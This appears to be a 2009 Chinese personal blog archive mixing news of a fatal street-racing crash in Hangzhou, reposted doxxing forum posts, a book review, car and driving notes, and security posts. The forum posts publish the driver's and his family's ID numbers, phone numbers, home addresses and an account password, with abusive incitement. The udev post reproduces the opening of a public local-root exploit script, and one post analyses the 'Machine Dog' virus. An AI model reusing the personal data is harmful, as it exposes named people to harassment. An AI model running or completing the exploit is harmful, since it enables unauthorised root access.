这段视频,可能是坐在保时捷997T里的人拍摄的,拍的是前面一辆银灰色奔驰迈凯轮SLR跑车的极速飙车场面:
视频开头,一辆奔驰跑车在前面开,开得并不快。随即出现一个年轻女子的声音:哦哦哦,大奔!此时,奔驰车可能发现后面有一辆保时捷997T跟着,便突然加速,在城市车流
中,像泥鳅一样,钻来钻去,极速前进,一会儿在地面,一会儿在高架上,试图将保时捷甩掉。而保时捷紧紧咬住对方不放。
视频长度5分钟,里面出现很多路牌,但因为是晚上,加上车速太快,看不清楚路牌上的字,不过里面出现的出租车颜色是绿色的,不知道是不是在杭州拍的。
网站还设有飘移专栏、改装成果等栏目。
手机撞烂了
截至发稿
遇难小伙子的家人还没找到
20:23,被撞的小伙子被120送进省立同德医院。
医院的陈医师说,送来时,他身边没有亲戚、朋友陪同;小伙子头部、胸部严重外伤,已经没有呼吸、心跳了,"抢救了半小时,宣布不治。"
医生从小伙子身上找到他的杭州市民卡,小伙子叫谭卓,1984年生,家庭住址在滨江。
医生说,本想从小伙子的手机电话簿里找到他的朋友、家人,但手机已经撞烂了,没法找(护士说,手机已经看不出是什么牌子了,有点像诺基亚,比较高档的款式)。
一位护士说,后来医院来了两个小伙子,说是谭卓的朋友,"我刮到一句,他们好像说看到车祸现场了,想想同德是最近的医院,就赶来了。他们看了一会,就走了。"
急救室门口,三个小伙子正在打电话,他们穿着朴素,急得满脸是汗,跺着脚:"谭卓出事了,大事,是车祸,他公司的领导电话是多少,他家里有没有电话的?"
看来对方知之甚少。小伙子挂了电话,又从包里掏出一个电话本,焦急地翻着。
死者谭卓很可能是在去看电影的路上遇难的
同德医院的护士在谭卓身上找到一张电影票――西城广场UME国际影城的票子,电影是《南京!南京!》,票价30元,时间是昨晚9:06。
从车祸发生地点,以及送进同德医院的时间上看,谭卓当时很可能是去电影院的路上。(见习记者 任烨 摄 )
肇事的浙A.608Z0早已上过报纸
浙江在线杭州200812月1日讯(见习记者 童俊)
晚上7时许,有网友打进本网热线(0571―85310961)称,建国北路乐购超市附近有辆改装过的跑车竟然在路面上"嚣张"地玩起了漂移。
记者赶到现场的时候,这辆"嚣张"的跑车和车主已经被交警带走了。在宝善桥建国路口公交车站候车的宋女士心有余悸地说,晚上7时15分左右,随着一阵刺耳的马达声,一辆红色的三菱跑车呼啸着从体育场路向建国北路开过来,车速很快,车尾还冒着白色的烟。
开到乐购超市门口附近时,这辆车竟然"嚣张"地在路面上玩起了漂移,原地转了一圈,在离公交车站台只有十几公分的时候才停下来。
车内两个穿着时髦的20多岁的年轻男子得意地朝着在公交站台上候车的一个小伙子打了声招呼,就在三人准备开车离开时,恰好巡逻的交警路过,这辆涉嫌改装的"牛车"被拦下了。
这时站台上的人们都围了过去,纷纷指责"嚣张"的车主,一位70多岁的老大爷气得直哆嗦,现在的年轻人怎么这样开车,站台上那么多人,要是这辆车突然冲上站台伤到人怎么办。
记者随后在车辆违章记录里查询到,这辆车牌为浙A.608Z0的跑车在2008年11月27日曾在艮山西路与机场路口违反禁止标线指示。
下城交警大队表示,改装车危害比较大,交警部门也是重点监控的。如果该车涉嫌超速就按照超速等违规行为处理。如果涉嫌改装,可以当场改回来的就责令当场改回,如果比较复杂,就把改装车拉回交警大队由专业部门来处理
建国北路乐购超市附近有辆改装过的跑车竟然在路面上"嚣张"地玩起了漂移。
赶到现场的时候,这辆"嚣张"的跑车和车主已经被交警带走了。在宝善桥建国路口公交车站候车的宋女士心有余悸地说,晚上7时15分左右,随着一阵刺耳的马达声,一辆红色的三菱跑车呼啸着从体育场路向建国北路开过来,车速很快,车尾还冒着白色的烟。
开到乐购超市门口附近时,这辆车竟然"嚣张"地在路面上玩起了漂移,原地转了一圈,在离公交车站台只有十几公分的时候才停下来。
车内两个穿着时髦的20多岁的年轻男子得意地朝着在公交站台上候车的一个小伙子打了声招呼,就在三人准备开车离开时,恰好巡逻的交警路过,这辆涉嫌改装的"牛车"被拦下了。
这时站台上的人们都围了过去,纷纷指责"嚣张"的车主,一位70多岁的老大爷气得直哆嗦,现在的年轻人怎么这样开车,站台上那么多人,要是这辆车突然冲上站台伤到人怎么办。
记者随后在车辆违章记录里查询到,这辆车牌为浙A.608Z0的跑车在2008年11月27日曾在艮山西路与机场路口违反禁止标线指示。
下城交警大队表示,改装车危害比较大,交警部门也是重点监控的。如果该车涉嫌超速就按照超速等违规行为处理。如果涉嫌改装,可以当场改回来的就责令当场改回,如果比较复杂,就把改装车拉回交警大队由专业部门来处理。
杭州富家子弟胡斌飚车撞死大学生,取保后上网称:你们这帮穷鬼,老子撞都撞了,你们能怎么样
Saturday, May 9th, 2009
肇事者姓名:胡斌
肇事者身份:某院校学生,杭州江干区人
杭州师范大学体育系大二的学生
浙A608Z0号兰瑟翼豪陆神牌小型轿车是他母亲陆某给他买的车
浙A608Z0
肇事者姓名:胡斌 肇事者身份:杭州师范学院体育系大二,杭州江干区人 QQ:181199732 密码:608Z0 车型:EVO 9代
车牌号浙A.608Z0车主:陆红英 手机号:13634162820 身份证号:330104198901202333 父亲:胡树明
另外一个手机号码:13958118382 宅电:85721339 肇事者姓名:胡斌 肇事者身份:杭州师范学院体育系大二,杭州江干区人
QQ:181199732 密码:608Z0 车型:EVO 9代 车牌号浙A.608Z0车主:陆红英 手机号:13634162820
身份证号:330104198901202333 父亲:胡树明 职业:服装业 用车:jeep牧马人 拍照:浙A290P8
肇事者身份:陈经纶体校中专学生,后挂靠杭州师范学院读大专(目前是毕业前的校外实习期,那种大二的说法是错误的),杭州江干区人,父母是在四季青(摊位号还没查到)卖服装的暴发户!!
富家子弟把城市道路当F1赛道终酿惨祸(图)
核心提示:7日,几个年轻人在城市道路上飙车,其中的一辆红色赛车撞死一名路人。围观者称,肇事小伙态度很差,撞死人还不当一回事。肇事的三菱跑车上印着两个网站,网站中称"这里聚集了国内顶尖的飘移赛车手"。
肇事司机坐在旁边的警车里。他双手不停地盖着脸,不停地挤着前额,揉着眼睛,偶尔露出手指缝,看着外面的动静。
肇事现场模拟图
肇事的三菱跑车
急救车赶到现场抢救
出事后肇事者同伴在街头说笑
浙江在线5月8日报道 昨 日20:27泽文何来电:文二西路西城广场往东一里路,有几个年轻人在飙车,一辆红色赛车,把一个路人撞死了。这个路人也是个小伙子,胳臂压得很难看,脑
浆流了一地,刚刚120把人接走了,交警到了。现在围观的人很多,都在骂这个肇事者,他态度很差的,撞死人还不当一回事。
20:45林曦来电:文二西路紫桂花园门口,一辆改装的红色三菱跑车,撞死一个行人。行人先被车头撞了,然后整个人飞起来撞到挡风玻璃,再飞出去。三菱车头凹了很大一块,挡风玻璃全碎了。人已经送走了,我拍了照片。
南都德加公寓的保安胡师傅说,出事地点在文二西路紫桂花园和德加公寓两个小区门之间的斑马线上。
交警听说胡师傅目击了车祸过程,带他到了斑马线旁,胡师傅手指斑马线,说开了――
晚上八点零几分样子,'轰轰轰'地跑来三辆车,都是很低很矮的跑车,速度很快很快。
有两辆车样子是差不多的,但是啥车,我没看清。还有一辆就是撞人的红色三菱。
被撞的那个小伙子当时是在过斑马线,不过当时我没看清是男是女。
人一下撞飞了起来,飞得很高很高,有那么高(胡师傅指了指德加公寓大门的门楣,门楣高约五米多)!人在空中翻了跟头,掉下来了。
一位紫桂花园的保安接着说:"开始我哪里以为会是人啊,撞飞得太高了!我以为是撞了车,保险杠什么的飞起来了呢!人掉下来后,离斑马线已经有20多米远了吧,当时刚好两个姑娘儿路过,一转脸,吓得抱头蹲了下来。"
一位黑衣女士说
夜里开开嘛,天还这么早,怎么好开的……
围观的路人纷纷指责,100码?150码都有了吧?不然人怎么可能撞得那么远?
撞人的红色三菱改装跑车,前牌照斜挂在一边,副驾驶位置的前挡风玻璃碎穿一个洞。
肇事司机是个小伙子,坐在旁边的警车里。他穿着POLO
T恤,右手戴一款运动型手表,右手臂上有一道弧形、约10厘米长的旧伤疤;他双手不停地盖着脸,不停地挤着前额,揉着眼睛,偶尔通过手指缝看着外面的动静。
一个打扮时髦、脖上戴着粗粗金链子的小伙子,在三菱跑车旁打着电话,声音不大,很平静:"小×撞死人了,过来看看,文二西路这里。"
10多分钟后,陆续来了七八个打扮时髦的小伙子,有三四个小伙子或牵、或揽着漂亮女孩。他们慢慢围到一个40多岁、穿黑色套裙的女士周围。
这个中年女士面色焦虑地看路人们的指责,当看到有相机镜头对准坐在警车里的小伙子时,她上前打圆场说:"他年纪还小,你们手下留点情……"
但责骂的声音太多,黑衣女士的声音很快弱了下来。她抱肩退到旁边,任由别人议论。
七八个小伙子也跟着她走到一边,黑衣女士用杭州话对他们说话,大意是:夜里开开嘛,天还这么早,怎么好开的……
小伙子们在一旁出着主意:赶紧找找人,看看有啥路子,到底该怎么处理……
黑衣女士躲到了一边,不断按着号码,捂着嘴小声说着――直到三菱跑车被拖走,警车也开走了,她的电话还没打完,算了下时间,至少有40分钟。
闻讯赶来的七八个小伙子,一直等在旁边,拿出烟,各自点上火,大口吐着烟圈。
据查,这辆红色三菱车的车主是位女性,40多岁。
遇难者谭卓简介:
湖南宁乡人
2002年入学浙江大学玉泉校区信电系通信工程03班
2006年毕业,进入杭州依赛通信有限公司工作
相关人肉搜索信息:
网易天津网友(218.67.*.*) 的原贴: 1 肇事者电话号码13634162820,已验证,名字叫胡斌
浙A608Z0车主是陆红英,应该就是肇事司机的母亲,也应该就是那个黑衣女子,住杭州市江干区濮家新村29幛2单元5**室
肇事者电话号码13634162820,已验证,名字叫胡斌
很吊!!!
他说欢迎大家来聊天
网易广东广州荔湾网友(218.19.*.*) 的原贴: 5
受害人是湖南人 浙江大学高材生
84年的 家中的独子 今年打算结婚的
凭什么就这样被人剥夺生存的权利
杭州宝康网络通讯工程有限公司 法人陆红英
陆红英和你那人渣的儿子胡斌
肇事者是杭州师范学院 体育专业的胡斌 一个有钱的富二代
受害者是浙江大学通信专业的毕业生
一个人渣杀害了一个人才
公司名称: 杭州宝康网络通讯工程有限公司
法人代表:
陆红英
身份证号码:330125660920402
注册资金:
地址: 西湖区文苑路康乐新村6幢1单元101室
电话: 0571-88986583
此人扣扣:一八一一九九七三二 空间密码 608Z0
网易北京网友(123.120.*.*) 的原贴: 2 顶上去
网易广东深圳网友(116.77.*.*) 的原贴: 3 肇事者电话号码13634162820,已验证,名字叫胡斌
很吊!!!
他说欢迎大家来聊天
受害人是湖南人 浙江大学高材生
84年的 家中的独子 今年打算结婚的
凭什么就这样被人剥夺生存的权利
杭州宝康网络通讯工程有限公司 法人陆红英
陆红英和你那人渣的儿子胡斌
肇事者是杭州师范学院 体育专业的胡斌 一个有钱的富二代
受害者是浙江大学通信专业的毕业生
一个人渣杀害了一个人才
公司名称: 杭州宝康网络通讯工程有限公司
法人代表:
陆红英
身份证号码:330125660920402
注册资金:
地址: 西湖区文苑路康乐新村6幢1单元101室
电话: 0571-88986583
网易广东深圳网友(116.77.*.*) 的原贴: 4 肇事者电话号码13634162820,已验证,名字叫胡斌
很吊!!!
他说欢迎大家来聊天
受害人是湖南人 浙江大学高材生
84年的 家中的独子 今年打算结婚的
凭什么就这样被人剥夺生存的权利
杭州宝康网络通讯工程有限公司 法人陆红英
陆红英和你那人渣的儿子胡斌
肇事者是杭州师范学院 体育专业的胡斌 一个有钱的富二代
受害者是浙江大学通信专业的毕业生
一个人渣杀害了一个人才
公司名称: 杭州宝康网络通讯工程有限公司
法人代表:
陆红英
身份证号码:330125660920402
注册资金:
地址: 西湖区文苑路康乐新村6幢1单元101室
电话: 0571-88986583
网易浙江杭州网友(218.108.*.*) 的原贴: 1
此人有逆行,严重超速飚车,撞死人,又有案底,
现在被取保候审了,又在19楼网上大放厥词:
丁丁EVO
不动产:单身公寓
19楼金币: 12 个
威望: 13 点
#1只看该作者
发表于 2009-5-8 15:58 资料 个人空间 短消息 加为好友
你们这帮穷鬼,老子撞都撞了,你们能怎么样
叫吧叫吧。。。。老子现在照样上网。。。。
嫉妒老子有钱啊,你们这帮没钱的,买的起车不?
这种人渣不严办,天理何在!!
网易浙江杭州网友(60.191.*.*) 的原贴: 2
顶死这厮
网易江苏南京网友(58.213.*.*) 的原贴: 3
顶死一楼!
网易河北石家庄网友(60.0.*.*) 的原贴: 4
这说明已经有人借机发财了!
网易福建厦门网友(120.32.*.*) 的原贴: 5
来吧 让人肉更猛烈些吧
看那些狗比律湿再叫嚣取缔人肉
网易北京海淀网友(123.112.*.*) 的原贴: 6
开个破三菱跑车还是改装的就敢说有钱?!!!SB太猖獗了!丫没见过有钱人把?搜出丫的活活抽死
网易浙江杭州网友 ip:125.120.*.*: 2009-05-08 12:07:05 发表
我看你们会怎么处理这个事情….
我是学法律的…如果严重的话..他的行为可以构成危害公共安全罪而不仅仅是交通肇事罪…
看你们依法治国是怎么治的….
网易浙江湖州网友 ip:125.125.*.*: 2009-05-08 16:15:52 发表
钱权交易会出现在这次事故中么?
大家一起关注杭州的交警如何处理这次事件
网易浙江杭州网友 ip:60.12.*.*: 2009-05-08 16:26:58 发表
学弟一路走好。天堂没有飚车的。
网易浙江杭州网友(122.224.*.*) 的原贴: 1
受害人是湖南人 浙江大学高材生
84年的 家中的独子 今年打算结婚的
凭什么就这样被人剥夺生存的权利
陆红英和你那人渣的儿子胡斌
杭州人民都盯着你们呢 你们要得到应有的惩罚
别耍花招 不然口水也要淹死你们
网易浙江杭州网友(122.224.*.*) 的原贴: 4
肇事者是杭州师范学院 体育专业的胡斌 一个有钱的富二代
受害者是浙江大学通信专业的毕业生
一个人渣杀害了一个人才
网易上海网友(219.233.*.*) 的原贴: 9
贱婢 你说你儿子还小 难道死者就大了 草拟么了隔壁 20多岁的年华 这事没完 一直人肉这LJ
网易浙江杭州网友(122.224.*.*) 的原贴: 13
体育专业 想想也知道不是考进去的
这种人呢向来蛮横
可怜了谭卓 你的父母和未婚妻将是多么痛苦
网易浙江湖州网友 ip:125.125.*.*: 2009-05-08 18:43:48 发表
这个车子我见过
在杭州东山弄的路口,因为有朋友拉了一把闪得快点了,不然我可能比谭卓走得更早点儿
那时候是大白天,中午12点左右,08年11月份的时候
这是肇事者朋友,名字叫"翁振华",车号浙A8X909
http://club.autohome.com.cn/blog/129628/,里面有着瘪三的照片。。
15644181 �狼啸月 编辑于:09-05-09 15:49
肇事者姓名:胡斌
肇事者身份:杭州师范学院体育系大二,杭州江干区人
身份证: 330104198901202333
手机:13634162820
QQ:181199732 密码:608Z0
车型:EVO 9代 车牌号浙A.608Z0车主:陆红英
车主:陆红英(肇事司机老娘)
住址:濮家新村29幢2单元501室
手机:13958118382
宅电:85721339
身份证号:330104198901202333
手机号:13634162820
肇事车主父亲胡树明
父亲:胡树明
职业:服装业
用车:jeep牧马人
拍照:浙A290P8
住址:濮家新村29幢2单元5楼
Tags: 13634162820, 13958118382, 181199732, 330104198901202333, 608Z0,
88986583, A290P8, A608Z0, EVO, 丁丁, 宝康, 宝康网络通讯工程, 富二代, 富家子弟, 撞死, 文二西路,
杭州, 杭州宝康, 杭州宝康网络通讯工程有限公司, 杭州师范大学, 杭州江干区, 浙A290P8, 浙A608Z0,
濮家新村29幢2单元501室, 濮家新村29幢2单元5楼, 胡斌, 胡树明, 西湖区文苑路康乐新村, 陆红英, 飚车
http://ricowong.net/?tag=608z0
闲来阅读,暮光之城,一本很棒的小说
大雨下了两天,早上起了雾,透着秋天的凉意。感觉还是累,很想睡一觉,但还有许多事情等着去做,把验收单子的复印件发过去,把移动的安全评估报告赶紧写出来。
累,想再睡一觉的感觉非常强烈,啥事都懒的去做,前几天过度疲劳了,昨天休息了一天还是没有恢复。这就是IT民工的生活,不断地透支着身体,每天体会着持续不断的疲累,永远没有完成的工作,永远也无法满足的客户需求。
周日在大雨中,终于可以暂时一下。没去睡懒觉。
晚上看了《暮光之城-新月》,没想到翻译的这么好,虽然有些错误的地方,但仍然瑕不掩瑜,是我最近看到的最好的翻译作品。语句比较自然。只是有些地方,需要经常接触英语的人才能懂的其中的竟境,和咱们中国人的想法还不一样,一般人是很难理解那句话,那种心理是怎么出现的。这也是没办法的,翻译也很难这种处理这种情况吧。
《暮光之城》是一系列书,据说知名度仅次于《哈雷波特》,非常适合青少处阅读,有趣、幻想、惊险、少年情谊、纠缠的爱情,写的是一个小镇的少女,与吸血鬼的奇异爱情故事,语句简短有力,却又充满着爱恨情仇,处处悬念,吊足人的味口,让人忍不住一口气读完。
爱德华的离开,让贝拉彻底崩溃,哀莫大于心死,和电影里面的僵尸一般,没有心跳,没有思考,没有时间,只有麻木,和无尽的心痛。幸好雅各布及时地走近贝拉的生活,给她修摩托车,给他灿烂的大笑,不断的快乐。没想到雅各布却变成狼人,彻底变成另外一个人。就在贝拉在爱情的痛苦中折磨,有吸血鬼的追杀中,承受着巨大的压力,一个人跳崖寻求刺激时,却让爱德华的妹妹,爱丽杰通过预见能力看到了,以为她在自杀。在一系列的误会中,爱德华以为心上人已经死去,他也寻求各种的机会自杀。幸好贝拉及时出现,才最终和爱德华得以相见。
最后,还是留下了许多疑问。
贝拉如果选择和爱德华在一起,最终会变成吸血鬼吗?雅各布的愤怒,最后会有什么故事呢?贝拉如果没有变成吸血鬼,她的美丽如何持续,她与爱德华的爱情还会一如继往吗?另外,意大利的吸血鬼皇室,会放弃追杀吗?后面肯定还会有大量的精彩故事。我都等不及,想到网上找原版来读了。作者的官方网站:http://www.stepheniemeyer.com/,
原文书的购买地址 http://www.amazon.com/gp/product/0316160202?ie=UTF8&tag=stepheniemeye-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0316160202
网上的试读章节 http://www.stepheniemeyer.com/pdf/eclipse_chapter1.pdf
Breaking Dawn (The Twilight Saga, Book 4)
by Stephenie Meyer
3.6 out of 5 stars (4,428) $12.64
New Moon (The Twilight Saga, Book 2)
by Stephenie Meyer
4.3 out of 5 stars (1,836) $6.04
Twilight (The Twilight Saga, Book 1)
by Stephenie Meyer
4.2 out of 5 stars (4,109) $6.04
The Host: A Novel
by Stephenie Meyer
4.2 out of 5 stars (1,047) $14.81
Twilight Soundtrack
~ Various Artists
4.3 out of 5 stars (490) $11.99
其实看这本小说前,我先在网上看到一部电影,也是类似的名字,打开一看,果然是这个系列,而且比电影再好看,更有趣,让人有更多的想像空间。阅读给人提供了更多的乐趣。
晚上一家子在灯下,小孩玩着自己的玩具,大人捧一本书阅读,感觉非常温馨,非常轻松。外面大雨瓢泼,屋内轻声笑语,温暖热闹,截然不同的两个世界。看着玩闹的孩子,看书的老婆,体会这其乐融融的幸福。
2009年5月2日星期六
udev漏洞
这个漏洞对各大企业的安全人员发起挑战,我们的软件资产管理系统是否有足够的数据支撑我们做下面的事情?
1、给哪些系统打补丁?
2、哪些系统已经打上了补丁?
3、新上线的系统打了补丁了吗?如何发现?
几个主流发行版已经发布了新的udev程序以修复这个问题,不幸中的万幸是修复这个漏洞不需要重启,对业务系统的影响相对小了很多。
我已确认受影响系统:
RHEL 5.X x86和x64
Debian 4.x 5.x x86和x64
最后不得不说一句,各位看官的跳板机赶紧升级,此时此刻最危险的就是它。grsecurity帮我们规避了这次风险,即使没打补丁,黑客也无法利用此漏洞获得root权限,cool!看来非高压的关键业务系统部署高级安全策略还是值得的。
udev[11037]: segfault at 0 ip ac6b949b sp b7f7ae98 error 4 in
libc-2.5.so[ac68c000+13e000]
udev[11370]: segfault at 0 ip 9b80c49b sp b120c868 error 4 in
libc-2.5.so[9b7df000+13e000]
http://milw0rm.com/exploits/8478
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
2009年4月25日星期六
2009年4月23日星期四
2009年4月19日星期日
实用的国产车
几个朋友问起来,开的啥车呀?我就开玩笑地说,奥迪A4L很接近啊。虽然是国产里面最好的,但还是有些羞愧,感觉没有达到足够的成功。有钱的成功人士,倒也不见的全开好车,我知道的几个千万级别的,开的只是几万块的捷达,但却绝对没有开国产的。国产意谓着啥呢?意谓着假劣伪冒,意谓着最便宜和最不靠谱。看到人家的神情,感觉象是,噢,开国产车呀,象是农村里发了点儿财,在门牙上贴了几个金光闪闪的金牙一般。
其实,抱着实用的精神,选择国产也没有坏处。一样地开,各方面,性能、舒适度,安全性,也差不多,甚至看一些车祸照片,安全性比价格更高的车,更是好上很多。车子就是个代步工具,周围的人,却花了更多的钱,去买那些一直用不到的功能,只是为了外表好看,满足自己的意淫。其实,现在的车子,就和若干年前的大哥大一样,早就失去了可以显摆的资本。任何有资格成为房奴的家庭,省出半个厕所
的钱,就能买个车了。再说,用手机、汽车或其它物质化的东西,去提高自己的身份,本身就是件多么幼稚可笑的事啊。
国产车有些小毛病,开不了多长时间,就成了修车师傅,成了汽车hacker。这并不是说反语,有点儿小毛病,是了解汽车的一个很好的途径,通过自己动手解决这些问题的过程,感觉很多乐趣,也学到了许多东西,让日子过的很充实。就象去了解病毒,了解网络攻击和防护,了解自我进化的程序,了解信息与现实的互动,了解眼前这个小小的东西,背后隐藏的力量,这一切都让人着迷,构成了生活最精彩的部分。
再者,现在的国际经济形势不好,可能形势会更加严峻,为什么不去多多支持中国的企业呢?
选择国产车,咱不后悔。
2009年4月13日星期一
安全驾驶的若干个习惯
多开几年后你的车速会降下来。
超过别的车,不代表你的车比人家的好。
超过同级或高级车,不代表你的技术比别人高。
第一个从绿灯下蹿出去,不代表在下一个路口你可以不排队。
飙车和高速狂奔,不代表胆识过人。
遇拥堵时,老老实实排队不代表你比别人傻。
不断刷新自己速度记录的想法和做法是不明智的,控制车速是摆脱危险的最佳手段。
安全行车时间是最值得你骄傲和炫耀的。
很多事故本可避免,在于主动放弃了快速反应的时间;
尽量了解你的车,知道车不能干什么,你为难它,它就会难为你。
别把车的做主权交给修理厂,换不换零件你说了算。
自己动手是一种乐趣,自己紧的螺丝心里最踏实。
别过于依赖4S店,有些毛病他们也查不出来。
尽量少使用喇叭和大灯。
停车入位时把车头对着可以直接离开的方向。
停车妨碍了别人,车是会被划的。
永远不要以为你可以一脚刹车把车"定"住。
可能的话,带上想搭车的人。
不准备出远门别把油箱加满。
保持车辆内外清洁和车内通风,不要让车内外温差太大。
最好别在晚上洗车。
过积水路面慢点开,别溅着其他人。
遇到故障车,即使搭不上手也安慰一句。
遇着老人孩子和行动不便的人,示意他们先过,要微笑。
备胎要有气。
背影看上去不错的美女帅哥,驶过别回头看。
车里的音乐自己听到就行。
下车时带走你的包。
车里放本有意思的书,堵车时它比咒骂管用。
系安全带要成为习惯。
2009年4月5日星期日
我设计的办公家具
坐在书桌前,有个特点,就是不能改变姿势,基本上一直这样,呆上一段时间就累坏了。
今天陪老婆逛街时,心里一直在想这事,应该有这样一种家俱。
可以自由调节高度,笔记本电脑放在上面,使用时,人可以蹲着用,盘腿而坐用,跪着用,躺着用,站着用,这样多种姿势经常变一变,就不那么容易累了。
在笔记本上面画了若干草画,实现其实挺简单的,不会比现在的那种办公家俱贵多少,而且还可以躺在床上用,非常方便啊,最上面再安上一个前些天做的LED灯,轻便又省电,以后自己的办公室里,一定用这种家具,让每个人办公时比较自由,有更多自己的空间,并且也有更多的公共空间,多好啊。现在的办公家俱,做的真是太没有想像力。
2009年4月3日星期五
最强大最便宜的后备电源
http://blog.chinaunix.net/u/29311/showart_243501.html
有意思的东东
虽然现在用不上,不过,可以尝试着把车载电源改造一下,用笔记本这么大的屏幕,作为GPS和音乐播放,常备工具一类的,总之,放在车里,会非常有用的。
机器狗病毒分析
报告类型:病毒原理逆向反汇编分析播报
编写作者:Coderui
编写日期:2008年01月15日
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
------------------------------------------------------------------------
对比"机器狗"一类新、老版本病毒的特征:
1:新版本"机器狗"病毒采用VC++ 6.0编写,老版本"机器狗"病毒采用汇编编写。
2:新版本"机器狗"病毒采用UPX加壳,老版本"机器狗"病毒采用未知壳。
3:新版本"机器狗"病毒驱动文件很小(1,536 字节),老版本"机器狗"病毒驱动文件很大(6,768 字节)。
4:新版本"机器狗"病毒安装驱动后没有执行卸载删除操作,老版本"机器狗"病毒安装驱动工作完毕后会卸载删除。
5:新版本"机器狗"病毒针对的是系统"conime.exe"、"ctfmon.exe"和"explorer.exe"程序文件,老版本"机器狗"病毒只针对系统"userinit.exe"文件。
6:新版本"机器狗"病毒没有对注册表进行操作,老版本"机器狗"病毒有对注册表"HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Windows
NT\CurrentVersion\Winlogon"项进行操作(感觉该操作没必要,因为重新启动系统后,"还原保护程序"系统会将其还原掉)。
7:新版本"机器狗"病毒去到系统dllcache文件夹下调用真实系统文件运行,老版本"机器狗"病毒没有到系统dllcache文件夹下调用真实系统文件运行。
8:新版本"机器狗"病毒采用的是控制台程序图标,老版本"机器狗"病毒采用的是黑色机器小狗图案的图标。
大概列举出来了上边的几点,经过仔细分析它们的工作原理和编码风格后,可以推测出新版本"机器狗"病毒和老版本"机器狗"病毒决定不是出自一个人之手。
------------------------------------------------------------------------
错误纠正:
在此要纠正两个技术性的问题,网络上流传的一些关于分析"机器狗"病毒(新、老版本)的部分文章中,有两处表达错误的地方。
第一处是:在那些分析文章中所提到"'机器狗'病毒会破坏'还原保护程序'系统,使其还原功能失效"。其实,从概念的理解上来讲述,那些表达都是错误的,是让人理解不清晰的,会严重误导读者。正确的表述应该是这样的:"'机器狗'病毒并没有破坏'还原保护程序'系统,也没有使其还原功能失效。只是安装了一个病毒自己的磁盘过滤驱动去操作真实的磁盘I/O端口,向真实的磁盘中执行修改覆盖"C:\windows\explorer.exe"目标文件(文件名是病毒作者定义的,不固定、会变。但肯定的是,真实磁盘中是存在该文件的。并且病毒运行后,一般只会修改覆盖一个真实磁盘中的系统文件,再不会去破坏其它真实磁盘中的文件)操作。虽然'机器狗'病毒运行后下载了很多其它恶意程序并安装运行,但重新启动计算机后,这些都会被'还原保护程序'系统还原掉的,只是唯一那个被修改覆盖的真实磁盘文件没有被还原。如果发现重新启动计算机后,系统中依然有一大堆病毒在运行。其实,这些都是系统重新启动后,由那个被修改覆盖后的系统程序全部重新下载回来并安装运行的恶意程序。也就是说,每次重新启动计算机,都要重新下载安装一次所有的其它恶意程序"。
第二处是:在那些分析文章中所提到"'机器狗'病毒会替换系统中的正常程序'conime.exe'、'ctfmon.exe'、'explorer.exe'
或'userinit.exe'"或"'机器狗'病毒会感染系统中的正常程序'conime.exe'、'ctfmon.exe'、
'explorer.exe'或'userinit.exe'"。其实,从概念的理解上来讲述,那些表达都是错误的,是让人理解不清晰的,会严重误导读者。正确的表述应该是这样的:"'机器狗'病毒并不是替换了系统中的那些正常文件,而是针对那些正常文件在硬盘中所存放的真实物理地址进行以覆盖的方式去写入相应的恶意数据。大家可以找来正常的系统文件'explorer.exe'、被病毒修改覆盖后的系统文件'explorer.exe'和病毒释放出来的恶意程序'tmp281.tmp'。对比它们内部数据代码后会发现,被病毒修改后的系统文件'explorer.exe'的前部分数据代码和"病毒释放出来的恶意程序'tmp281.tmp'文件的数据代码是完全相同的,而后边的数据代码依然是正常系统文件'explorer.exe'后边的数据代码。"。
简单的概念解释:
替换:把原目标程序的数据代码全部清除掉,用新程序的数据代码来代替以前的整个程序。这样,替换后的程序只有新程序的功能。
感染:在不破坏原目标程序数据代码的前提下,向原目标程序的数据代码中追加上新程序的数据代码。这样,感染后的程序既有原目标程序的功能,又有新程序的功能。
覆盖:从原目标程序数据代码的文件头0地址处开始,向后依次执行覆盖写入新程序的数据代码操作,我们这里只假设原目标程序文件远远大于新程序。这样,覆盖后的程序只执行新程序的功能,虽然原目标程序的数据代码还存在一部分,但由于没有被调用,所以不会执行。
------------------------------------------------------------------------
总结:
上边所指的"还原保护程序"为利用磁盘过滤驱动技术编写而成的系统还原保护程序,出名一点的软件有"冰点还原精灵"和"影子系统"等。也就是说,就算用户计算机安装了上边这样的"还原保护程序",只要是中了"机器狗"一类利用穿"还原保护程序"技术的病毒,就算您重新启动计算机了,但被修改的那个文件
"explorer.exe"也是依然不会被还原的,因为病毒的恶意代码已经覆盖进了这个真实的磁盘文件中。
目前的"机器狗"一类利用穿"还原保护程序"技术的病毒有一个致命的软肋,那就是他们所覆盖的真实系统文件在重新启动计算机后一定要自启动运行,不然就失去病毒存在的意义了。现今的"机器狗"病毒都只是能够穿透磁盘保护的,并穿透不了注册表(无法在注册表中保存添加或修改后的数据信息),这个就是它最大的缺陷。其实,注册表数据信息也是以文件的形式保存在磁盘中的,下一代"机器狗"病毒可能会实现穿透注册表的功能,等那个时候,可能就很难防范了。这还是不算什么的,下下一代的"机器狗"病毒可能会利用自己的磁盘过滤驱动去感染真实硬盘下的PE文件,相当的恐怖啊!!
一旦感染了该版本的"机器狗"病毒,它不仅仅可以穿透"还原保护程序",真实系统也一样会中毒。因为病毒修改覆盖了真实的系统文件"C:\windows
